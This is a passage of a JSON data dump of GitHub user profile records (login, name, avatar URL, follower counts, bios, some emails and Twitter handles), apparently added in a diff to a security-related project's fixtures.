+ "nest_created_at": "2024-09-12T03:12:03.530Z", + "nest_updated_at": "2024-09-12T03:12:03.530Z", + "name": "", + "login": "ccc17as", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/82218705?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2021-04-09T12:45:35Z", + "updated_at": "2023-12-14T20:09:02Z", + "node_id": "MDQ6VXNlcjgyMjE4NzA1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3037, + "fields": { + "nest_created_at": "2024-09-12T03:12:04.380Z", + "nest_updated_at": "2024-09-12T03:12:04.380Z", + "name": "Thorsten Sick", + "login": "Thorsten-Sick", + "email": "thorsten.sick@email.de", + "avatar_url": "https://avatars.githubusercontent.com/u/537519?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 51, + "public_gists_count": 0, + "public_repositories_count": 57, + "created_at": "2010-12-27T06:59:52Z", + "updated_at": "2023-12-21T13:44:26Z", + "node_id": "MDQ6VXNlcjUzNzUxOQ==", + "bio": "Security engineer, architect, mad scientist, coach and author.\r\n@ThorstenSick", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3038, + "fields": { + "nest_created_at": "2024-09-12T03:12:06.068Z", + "nest_updated_at": "2024-09-22T20:30:33.258Z", + "name": "Raphael Ahrens", + "login": "raphaelahrens", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5632364?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 22, + "followers_count": 13, + "public_gists_count": 0, + "public_repositories_count": 50, + "created_at": "2013-10-07T20:07:55Z", + "updated_at": "2024-08-08T19:48:09Z", + "node_id": "MDQ6VXNlcjU2MzIzNjQ=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3039, + "fields": { + "nest_created_at": "2024-09-12T03:12:07.704Z", + "nest_updated_at": "2024-09-22T17:34:44.539Z", + "name": "", + "login": "Hummus-Ful", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11685796?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 4, + "public_gists_count": 1, + "public_repositories_count": 13, + "created_at": "2015-03-27T20:09:41Z", + "updated_at": "2024-07-10T13:55:34Z", + "node_id": "MDQ6VXNlcjExNjg1Nzk2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3040, + "fields": { + "nest_created_at": "2024-09-12T03:12:13.625Z", + "nest_updated_at": "2024-09-22T20:30:40.882Z", + "name": "", + "login": "devsecopsmaturitymodel", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/146089092?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2023-09-26T11:31:25Z", + "updated_at": "2023-11-06T10:30:14Z", + "node_id": "O_kgDOCLUkhA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3041, + "fields": { + "nest_created_at": "2024-09-12T03:12:17.207Z", + "nest_updated_at": "2024-09-22T20:30:45.713Z", + "name": "Aryan", + "login": "0x41head", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/53595853?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 46, + "created_at": "2019-08-02T06:13:54Z", + "updated_at": "2024-09-13T11:29:34Z", + "node_id": "MDQ6VXNlcjUzNTk1ODUz", + "bio": "", + "is_hireable": false, + "twitter_username": "0x41head" + } +}, +{ + "model": "github.user", + "pk": 3042, + "fields": { + "nest_created_at": "2024-09-12T03:12:18.082Z", + "nest_updated_at": "2024-09-18T00:24:30.896Z", + "name": "", + "login": "enzowritescode", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1328683?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2012-01-13T20:08:33Z", + "updated_at": "2024-08-06T17:59:38Z", + "node_id": "MDQ6VXNlcjEzMjg2ODM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3043, + "fields": { + "nest_created_at": "2024-09-12T03:12:53.545Z", + "nest_updated_at": "2024-09-22T20:32:07.386Z", + "name": "OWASP Amass Project", + "login": "owasp-amass", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/128647419?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 351, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2023-03-22T21:57:39Z", + "updated_at": "2024-09-01T11:32:49Z", + "node_id": "O_kgDOB6sA-w", + "bio": "In-depth Attack Surface Mapping and Asset Discovery", + "is_hireable": false, + "twitter_username": "owaspamass" + } +}, +{ + "model": "github.user", + "pk": 3044, + "fields": { + "nest_created_at": "2024-09-12T03:13:02.026Z", + "nest_updated_at": "2024-09-22T20:32:11.014Z", + "name": "Jeff Foley", + "login": "caffix", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7319658?v=4", + "company": "@OWASP", + "location": "New York, United States", + "collaborators_count": 0, + "following_count": 121, + "followers_count": 1366, + "public_gists_count": 1, + "public_repositories_count": 26, + "created_at": "2014-04-16T21:00:57Z", + "updated_at": "2024-09-20T03:39:37Z", + "node_id": "MDQ6VXNlcjczMTk2NTg=", + "bio": "Project Leader of @OWASP Amass", + "is_hireable": false, + "twitter_username": "jeff_foley" + } +}, +{ + "model": "github.user", + "pk": 3045, + "fields": { + "nest_created_at": "2024-09-12T03:13:04.585Z", + "nest_updated_at": "2024-09-22T20:31:09.831Z", + "name": "Nikos Gk", + "login": "ngkogkos", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1519209?v=4", + "company": "None", + "location": "Greece", + "collaborators_count": 0, + "following_count": 14, + "followers_count": 59, + "public_gists_count": 0, + "public_repositories_count": 22, + "created_at": "2012-03-09T08:01:32Z", + "updated_at": "2024-06-01T18:07:17Z", + "node_id": "MDQ6VXNlcjE1MTkyMDk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3046, + "fields": { + "nest_created_at": "2024-09-12T03:13:05.397Z", + "nest_updated_at": "2024-09-12T03:13:05.397Z", + "name": "", + "login": "aomdev1", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/54966082?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-09-06T00:26:48Z", + "updated_at": "2019-09-06T00:26:48Z", + "node_id": "MDQ6VXNlcjU0OTY2MDgy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3047, + "fields": { + "nest_created_at": "2024-09-12T03:13:07.931Z", + "nest_updated_at": "2024-09-12T03:13:07.931Z", + "name": "", + "login": "nullenc0de", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/30237867?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 186, + "public_gists_count": 47, + "public_repositories_count": 24, + "created_at": "2017-07-17T14:44:58Z", + "updated_at": "2024-01-31T21:18:58Z", + "node_id": "MDQ6VXNlcjMwMjM3ODY3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3048, + "fields": { + "nest_created_at": "2024-09-12T03:13:08.889Z", + "nest_updated_at": "2024-09-12T03:13:08.889Z", + "name": "Flightkick", + "login": "Flightkick", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8693699?v=4", + "company": "", + "location": "The Netherlands", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 27, + "created_at": "2014-09-08T08:53:57Z", + "updated_at": "2024-05-06T09:01:54Z", + "node_id": "MDQ6VXNlcjg2OTM2OTk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3049, + "fields": { + "nest_created_at": "2024-09-12T03:13:10.576Z", + "nest_updated_at": "2024-09-12T03:13:10.577Z", + "name": "", + "login": "myst404", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12991725?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 26, + "public_gists_count": 7, + "public_repositories_count": 8, + "created_at": "2015-06-21T21:09:36Z", + "updated_at": "2023-11-13T12:32:58Z", + "node_id": "MDQ6VXNlcjEyOTkxNzI1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3050, + "fields": { + "nest_created_at": "2024-09-12T03:13:11.418Z", + "nest_updated_at": "2024-09-12T03:13:11.418Z", + "name": "Stojan", + "login": "GitGitNS", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16868806?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2016-01-24T20:59:30Z", + "updated_at": "2020-06-17T19:19:25Z", + "node_id": "MDQ6VXNlcjE2ODY4ODA2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3051, + "fields": { + "nest_created_at": "2024-09-12T03:13:13.937Z", + "nest_updated_at": "2024-09-12T03:13:13.937Z", + "name": "Daehee", + "login": "daehee", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/81271?v=4", + "company": "", + "location": "Phoenix, AZ", + "collaborators_count": 0, + "following_count": 176, + "followers_count": 91, + "public_gists_count": 19, + "public_repositories_count": 33, + "created_at": "2009-05-05T16:28:37Z", + "updated_at": "2024-08-11T02:13:57Z", + "node_id": "MDQ6VXNlcjgxMjcx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3052, + "fields": { + "nest_created_at": "2024-09-12T03:13:15.584Z", + "nest_updated_at": "2024-09-12T03:13:15.584Z", + "name": "Avi", + "login": "Avileox", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/40210313?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 83, + "followers_count": 67, + "public_gists_count": 7, + "public_repositories_count": 2, + "created_at": "2018-06-12T15:53:50Z", + "updated_at": "2024-07-08T05:45:46Z", + "node_id": "MDQ6VXNlcjQwMjEwMzEz", + "bio": "Application Security Enthusiast", + "is_hireable": false, + "twitter_username": "avileox" + } +}, +{ + "model": "github.user", + "pk": 3053, + "fields": { + "nest_created_at": "2024-09-12T03:13:17.234Z", + "nest_updated_at": "2024-09-12T03:13:17.234Z", + "name": "Dan Gardner", + "login": "dan-processbolt", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/45269444?v=4", + "company": "@ProcessBolt, Inc.", + "location": "Minneapolis, MN", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2018-11-22T17:07:20Z", + "updated_at": "2023-10-27T19:20:09Z", + "node_id": "MDQ6VXNlcjQ1MjY5NDQ0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3054, + "fields": { + "nest_created_at": "2024-09-12T03:13:18.060Z", + "nest_updated_at": "2024-09-12T03:13:46.315Z", + "name": "", + "login": "CravateRouge", + "email": "baptiste@cravaterouge.com", + "avatar_url": "https://avatars.githubusercontent.com/u/16681900?v=4", + "company": "CravateRouge Ltd", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 145, + "public_gists_count": 0, + "public_repositories_count": 35, + "created_at": "2016-01-13T09:04:05Z", + "updated_at": "2024-07-02T17:39:59Z", + "node_id": "MDQ6VXNlcjE2NjgxOTAw", + "bio": "Need a hand with your information system security? Send me an email.", + "is_hireable": true, + "twitter_username": "rouge_cravate" + } +}, +{ + "model": "github.user", + "pk": 3055, + "fields": { + "nest_created_at": "2024-09-12T03:13:18.869Z", + "nest_updated_at": "2024-09-22T19:49:28.325Z", + "name": "0x73746F66", + "login": "chrisdlangton", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3494633?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 56, + "public_gists_count": 52, + "public_repositories_count": 3, + "created_at": "2013-02-06T19:09:41Z", + "updated_at": "2024-09-17T14:37:49Z", + "node_id": "MDQ6VXNlcjM0OTQ2MzM=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3056, + "fields": { + "nest_created_at": "2024-09-12T03:13:19.676Z", + "nest_updated_at": "2024-09-12T03:13:19.676Z", + "name": "Ryan", + "login": "rjenningsuk", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17529217?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2016-02-28T14:49:58Z", + "updated_at": "2024-05-19T19:14:23Z", + "node_id": "MDQ6VXNlcjE3NTI5MjE3", + "bio": "Contract Full-Stack PHP Developer\r\nLaravel & Symfony", + "is_hireable": false, + "twitter_username": "ryanjuk" + } +}, +{ + "model": "github.user", + "pk": 3057, + "fields": { + "nest_created_at": "2024-09-12T03:13:20.481Z", + "nest_updated_at": "2024-09-12T03:13:20.481Z", + "name": "ipk1", + "login": "ipk1", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32953048?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 33, + "followers_count": 14, + "public_gists_count": 8, + "public_repositories_count": 319, + "created_at": "2017-10-20T08:08:39Z", + "updated_at": "2024-08-30T15:09:46Z", + "node_id": "MDQ6VXNlcjMyOTUzMDQ4", + "bio": "1Kadaba", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3058, + "fields": { + "nest_created_at": "2024-09-12T03:13:21.327Z", + "nest_updated_at": "2024-09-12T03:14:32.610Z", + "name": "", + "login": "c3101", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1291019?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2011-12-28T18:59:57Z", + "updated_at": "2024-08-22T12:45:38Z", + "node_id": "MDQ6VXNlcjEyOTEwMTk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3059, + "fields": { + "nest_created_at": "2024-09-12T03:13:22.175Z", + "nest_updated_at": "2024-09-12T03:13:22.175Z", + "name": "$nyx", + "login": "Arteneko", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/23583792?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 57, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2016-11-19T18:08:09Z", + "updated_at": "2023-11-11T14:43:53Z", + "node_id": "MDQ6VXNlcjIzNTgzNzky", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3060, + "fields": { + "nest_created_at": "2024-09-12T03:13:23.028Z", + "nest_updated_at": "2024-09-12T03:14:50.105Z", + "name": "", + "login": "gprime31", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/44535257?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 30, + "public_gists_count": 55, + "public_repositories_count": 1050, + "created_at": "2018-10-27T22:12:19Z", + "updated_at": "2024-09-08T03:40:37Z", + "node_id": "MDQ6VXNlcjQ0NTM1MjU3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3061, + "fields": { + "nest_created_at": "2024-09-12T03:13:23.893Z", + "nest_updated_at": "2024-09-22T20:31:15.964Z", + "name": "", + "login": "ZeroDot1", + "email": "zerodot1@bk.ru", + "avatar_url": "https://avatars.githubusercontent.com/u/28985171?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 7, + "public_repositories_count": 33, + "created_at": "2017-05-26T15:46:11Z", + "updated_at": "2024-06-11T11:27:23Z", + "node_id": "MDQ6VXNlcjI4OTg1MTcx", + "bio": "Independent Security Researcher, #CoinBlockerLists\r\n\r\nLogo created by: https://twitter.com/euphoricfall", + "is_hireable": false, + "twitter_username": "zero_dot1" + } +}, +{ + "model": "github.user", + "pk": 3062, + "fields": { + "nest_created_at": "2024-09-12T03:13:24.714Z", + "nest_updated_at": "2024-09-12T03:13:24.714Z", + "name": "mehmet salih bindak", + "login": "cyb3rsalih", + "email": "mehmetsalihbindak@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/17196669?v=4", + "company": "", + "location": "TR", + "collaborators_count": 0, + "following_count": 38, + "followers_count": 23, + "public_gists_count": 40, + "public_repositories_count": 61, + "created_at": "2016-02-12T11:45:37Z", + "updated_at": "2024-08-20T11:37:38Z", + "node_id": "MDQ6VXNlcjE3MTk2NjY5", + "bio": "Mobile Developer", + "is_hireable": false, + "twitter_username": "msalihb" + } +}, +{ + "model": "github.user", + "pk": 3063, + "fields": { + "nest_created_at": "2024-09-12T03:13:25.514Z", + "nest_updated_at": "2024-09-12T03:13:25.514Z", + "name": "Mateusz", + "login": "as-km", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/55695113?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2019-09-23T11:23:47Z", + "updated_at": "2024-08-12T09:12:36Z", + "node_id": "MDQ6VXNlcjU1Njk1MTEz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3064, + "fields": { + "nest_created_at": "2024-09-12T03:13:26.332Z", + "nest_updated_at": "2024-09-12T03:13:26.332Z", + "name": "iambatman", + "login": "MR-pentestGuy", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/71591447?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 14, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2020-09-20T11:13:57Z", + "updated_at": "2024-07-24T11:08:28Z", + "node_id": "MDQ6VXNlcjcxNTkxNDQ3", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3065, + "fields": { + "nest_created_at": "2024-09-12T03:13:27.130Z", + "nest_updated_at": "2024-09-12T03:13:27.130Z", + "name": "", + "login": "rabx", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4164301?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 27, + "created_at": "2013-04-15T19:52:09Z", + "updated_at": "2024-09-07T01:24:42Z", + "node_id": "MDQ6VXNlcjQxNjQzMDE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3066, + "fields": { + "nest_created_at": "2024-09-12T03:13:27.982Z", + "nest_updated_at": "2024-09-12T03:13:27.982Z", + "name": "BugMania", + "login": "knowthetech", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/52136037?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 23, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2019-06-23T17:46:21Z", + "updated_at": "2024-08-30T12:57:17Z", + "node_id": "MDQ6VXNlcjUyMTM2MDM3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3067, + "fields": { + "nest_created_at": "2024-09-12T03:13:28.808Z", + "nest_updated_at": "2024-09-12T03:13:28.808Z", + "name": "", + "login": "zfxlg01", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/86958586?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2021-07-05T10:15:30Z", + "updated_at": "2023-06-23T09:10:38Z", + "node_id": "MDQ6VXNlcjg2OTU4NTg2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3068, + "fields": { + "nest_created_at": "2024-09-12T03:13:29.614Z", + "nest_updated_at": "2024-09-22T20:31:05.305Z", + "name": "Pham Sy Minh", + "login": "shelld3v", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/59408894?v=4", + "company": "", + "location": "Hanoi, Vietnam", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 362, + "public_gists_count": 2, + "public_repositories_count": 63, + "created_at": "2020-01-01T09:03:59Z", + "updated_at": "2023-11-09T10:27:46Z", + "node_id": "MDQ6VXNlcjU5NDA4ODk0", + "bio": "Cyber security enthusiast and jobless coder", + "is_hireable": false, + "twitter_username": "shells3c_" + } +}, +{ + "model": "github.user", + "pk": 3069, + "fields": { + "nest_created_at": "2024-09-12T03:13:30.445Z", + "nest_updated_at": "2024-09-12T03:13:30.445Z", + "name": "Patrik Fehrenbach", + "login": "PatrikFehrenbach", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9072595?v=4", + "company": "", + "location": "Deutschland", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 270, + "public_gists_count": 4, + "public_repositories_count": 18, + "created_at": "2014-10-08T08:10:38Z", + "updated_at": "2024-09-06T15:02:34Z", + "node_id": "MDQ6VXNlcjkwNzI1OTU=", + "bio": "Hello! I'm Patrik, a cybersecurity enthusiast with a keen interest in the dynamic field of bug bounty hunting. With a background in computer science ", + "is_hireable": true, + "twitter_username": "itsecurityguard" + } +}, +{ + "model": "github.user", + "pk": 3070, + "fields": { + "nest_created_at": "2024-09-12T03:13:31.277Z", + "nest_updated_at": "2024-09-12T03:13:31.277Z", + "name": "Postmodern", + "login": "postmodern", + "email": "postmodern.mod3@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/12671?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 86, + "followers_count": 974, + "public_gists_count": 103, + "public_repositories_count": 202, + "created_at": "2008-06-05T06:47:44Z", + "updated_at": "2024-07-20T00:55:50Z", + "node_id": "MDQ6VXNlcjEyNjcx", + "bio": "Software Engineer, Open Source developer and maintainer, sometimes InfoSec. Ruby, Crystal, Bash.", + "is_hireable": false, + "twitter_username": "postmodern_mod3" + } +}, +{ + "model": "github.user", + "pk": 3071, + "fields": { + "nest_created_at": "2024-09-12T03:13:32.118Z", + "nest_updated_at": "2024-09-12T03:13:32.118Z", + "name": "", + "login": "Isaac21e", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/35118577?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2018-01-04T23:09:09Z", + "updated_at": "2024-08-15T11:11:28Z", + "node_id": "MDQ6VXNlcjM1MTE4NTc3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3072, + "fields": { + "nest_created_at": "2024-09-12T03:13:32.914Z", + "nest_updated_at": "2024-09-12T03:14:48.438Z", + "name": "", + "login": "nil0x42", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3504393?v=4", + "company": "Exdemia IT Security", + "location": "", + "collaborators_count": 0, + "following_count": 69, + "followers_count": 481, + "public_gists_count": 19, + "public_repositories_count": 14, + "created_at": "2013-02-07T18:47:30Z", + "updated_at": "2024-09-01T11:23:57Z", + "node_id": "MDQ6VXNlcjM1MDQzOTM=", + "bio": "", + "is_hireable": true, + "twitter_username": "nil0x42" + } +}, +{ + "model": "github.user", + "pk": 3073, + "fields": { + "nest_created_at": "2024-09-12T03:13:33.735Z", + "nest_updated_at": "2024-09-12T03:13:33.735Z", + "name": "Solomon Sklash", + "login": "SolomonSklash", + "email": "solomonsklash@0xfeed.io", + "avatar_url": "https://avatars.githubusercontent.com/u/43149956?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 55, + "followers_count": 417, + "public_gists_count": 28, + "public_repositories_count": 216, + "created_at": "2018-09-10T18:27:43Z", + "updated_at": "2024-08-09T16:24:10Z", + "node_id": "MDQ6VXNlcjQzMTQ5OTU2", + "bio": "Offensive security.", + "is_hireable": false, + "twitter_username": "SolomonSklash" + } +}, +{ + "model": "github.user", + "pk": 3074, + "fields": { + "nest_created_at": "2024-09-12T03:13:35.443Z", + "nest_updated_at": "2024-09-12T03:13:45.479Z", + "name": "", + "login": "UFeindschiff", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2279391?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2012-09-04T17:38:33Z", + "updated_at": "2024-05-14T17:48:07Z", + "node_id": "MDQ6VXNlcjIyNzkzOTE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3075, + "fields": { + "nest_created_at": "2024-09-12T03:13:36.249Z", + "nest_updated_at": "2024-09-12T03:13:36.250Z", + "name": "", + "login": "WesWrench", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/31844088?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 5, + "public_gists_count": 1, + "public_repositories_count": 6, + "created_at": "2017-09-11T08:13:47Z", + "updated_at": "2024-08-27T09:06:34Z", + "node_id": "MDQ6VXNlcjMxODQ0MDg4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3076, + "fields": { + "nest_created_at": "2024-09-12T03:13:37.119Z", + "nest_updated_at": "2024-09-12T03:13:37.119Z", + "name": "", + "login": "MdBulbulHosain", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/95719231?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-12-07T20:50:51Z", + "updated_at": "2023-08-12T08:35:23Z", + "node_id": "U_kgDOBbSPPw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3077, + "fields": { + "nest_created_at": "2024-09-12T03:13:37.935Z", + "nest_updated_at": "2024-09-12T03:13:37.935Z", + "name": "Obad Zafar", + "login": "Obad94", + "email": "zafarobad@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/29942077?v=4", + "company": "NED University of Engineering & Technology", + "location": "Karachi, Pakistan", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2017-07-06T07:16:02Z", + "updated_at": "2024-08-16T09:42:46Z", + "node_id": "MDQ6VXNlcjI5OTQyMDc3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3078, + "fields": { + "nest_created_at": "2024-09-12T03:13:38.766Z", + "nest_updated_at": "2024-09-12T03:13:38.766Z", + "name": "Aidan Barrington", + "login": "nvqna", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2392934?v=4", + "company": "", + "location": "NYC", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 17, + "public_repositories_count": 23, + "created_at": "2012-09-21T11:07:37Z", + "updated_at": "2024-08-20T21:12:51Z", + "node_id": "MDQ6VXNlcjIzOTI5MzQ=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3079, + "fields": { + "nest_created_at": "2024-09-12T03:13:39.609Z", + "nest_updated_at": "2024-09-12T03:13:39.609Z", + "name": "softScheck GmbH", + "login": "softScheck", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20166884?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 55, + "public_gists_count": 5, + "public_repositories_count": 7, + "created_at": "2016-06-27T12:08:56Z", + "updated_at": "2024-08-28T09:09:19Z", + "node_id": "MDQ6VXNlcjIwMTY2ODg0", + "bio": "We identify vulnerabilities others don't.", + "is_hireable": false, + "twitter_username": "softScheck" + } +}, +{ + "model": "github.user", + "pk": 3080, + "fields": { + "nest_created_at": "2024-09-12T03:13:40.475Z", + "nest_updated_at": "2024-09-12T03:13:40.475Z", + "name": "", + "login": "intrd", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2204686?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 74, + "followers_count": 89, + "public_gists_count": 80, + "public_repositories_count": 19, + "created_at": "2012-08-23T14:23:46Z", + "updated_at": "2024-08-23T17:12:00Z", + "node_id": "MDQ6VXNlcjIyMDQ2ODY=", + "bio": "", + "is_hireable": true, + "twitter_username": "intrd" + } +}, +{ + "model": "github.user", + "pk": 3081, + "fields": { + "nest_created_at": "2024-09-12T03:13:43.808Z", + "nest_updated_at": "2024-09-12T03:13:43.808Z", + "name": "", + "login": "gaalos", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32361668?v=4", + "company": "rog", + "location": "", + "collaborators_count": 0, + 